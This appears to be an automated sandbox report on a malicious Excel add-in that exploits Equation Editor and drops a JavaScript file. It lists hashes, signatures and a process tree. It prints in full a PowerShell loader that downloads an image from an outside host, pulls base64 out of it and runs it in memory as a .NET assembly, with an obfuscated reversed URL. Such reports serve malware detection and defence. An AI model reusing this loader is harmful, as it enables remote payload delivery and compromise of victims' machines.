Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
  • submitted
    29/10/2023, 01:21

General

  • Target

    cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31.xlam

  • Size

    668KB

  • MD5

    41b8a5aadded29c7ef57e41bb0102152

  • SHA1

    ab78de829952f86e61f2fa351ce7bddf0c4a23bb

  • SHA256

    cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31

  • SHA512

    6d31fc6ce6de3ffc4cc84fe3207e10c52e5ef31986293442b0f9214dae4c914661e574b857958ff8ea290b4961b6e025a610f375bde144d47eb610bdaff487ba

  • SSDEEP

    12288:OK+e21N8IWOpr1Mu+VXSnuM95oOVPMX6Yyhf69cHhIAIY+2AmSMIHgJjAbDs2sd:O02f8+prO1VXk5oa564kTdZHCkYz

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg

exe.dropper

https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\cffadf4bee42624c634e37a15e3da2aa08cc080e359df25b39fdda5645a62f31.xlam
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2892
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\yhgdrypl.js"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2660
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[long base64 blob, mis-encoded in extraction, elided; the decoded script is the command line of the child powershell.exe, PID 1480, below]';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.repl"ace('�✘','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.nym/15.33.24.391//:ptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1480

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZATKV9CL2DTTDR4MNYLX.temp

    Filesize

    7KB

    MD5

    7f87960970e9e581c79a9c860df487f6

    SHA1

    33aff70c3cd824783848da0081641c8c473b3f63

    SHA256

    03dedcac47b0d218130b31b1fd6a53d0ade2003d72576771e0116eb358a849fe

    SHA512

    76694c321e13603005764e3828bdfe3bdcaf0b912eefda06d34c50c25441a0bd983df08c3ace938ef1e78fda1913e5e8511593b93b2b443f940465dc62ac3a93

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    7f87960970e9e581c79a9c860df487f6

    SHA1

    33aff70c3cd824783848da0081641c8c473b3f63

    SHA256

    03dedcac47b0d218130b31b1fd6a53d0ade2003d72576771e0116eb358a849fe

    SHA512

    76694c321e13603005764e3828bdfe3bdcaf0b912eefda06d34c50c25441a0bd983df08c3ace938ef1e78fda1913e5e8511593b93b2b443f940465dc62ac3a93

  • C:\Users\Admin\AppData\Roaming\yhgdrypl.js

    Filesize

    177KB

    MD5

    16ca1b3b70545723e278cef80dd40629

    SHA1

    decd934b39d051560d637b9727f56f9abd5e5491

    SHA256

    11aad61d002a805b706e90facdd0a047796c1f459705bd62a6bc7e67dbcd09a6

    SHA512

    dd2fba9fd39dad7a64566979fa58cc19b872a5119391b146d36fed300fe3fd6117f41b0a17bd60aadbb017b2053afcf673d29e2093270f44d1f5bcde29b8e49c

  • memory/1480-26-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/1480-24-0x00000000026F0000-0x0000000002730000-memory.dmp

    Filesize

    256KB

  • memory/1480-23-0x00000000026F0000-0x0000000002730000-memory.dmp

    Filesize

    256KB

  • memory/1480-22-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/1480-21-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-12-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-14-0x00000000025E0000-0x0000000002620000-memory.dmp

    Filesize

    256KB

  • memory/2484-13-0x00000000025E0000-0x0000000002620000-memory.dmp

    Filesize

    256KB

  • memory/2484-11-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-25-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2484-27-0x000000006C850000-0x000000006CDFB000-memory.dmp

    Filesize

    5.7MB

  • memory/2892-15-0x0000000072BFD000-0x0000000072C08000-memory.dmp

    Filesize

    44KB

  • memory/2892-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2892-1-0x0000000072BFD000-0x0000000072C08000-memory.dmp

    Filesize

    44KB

  • memory/2892-29-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2892-30-0x0000000072BFD000-0x0000000072C08000-memory.dmp

    Filesize

    44KB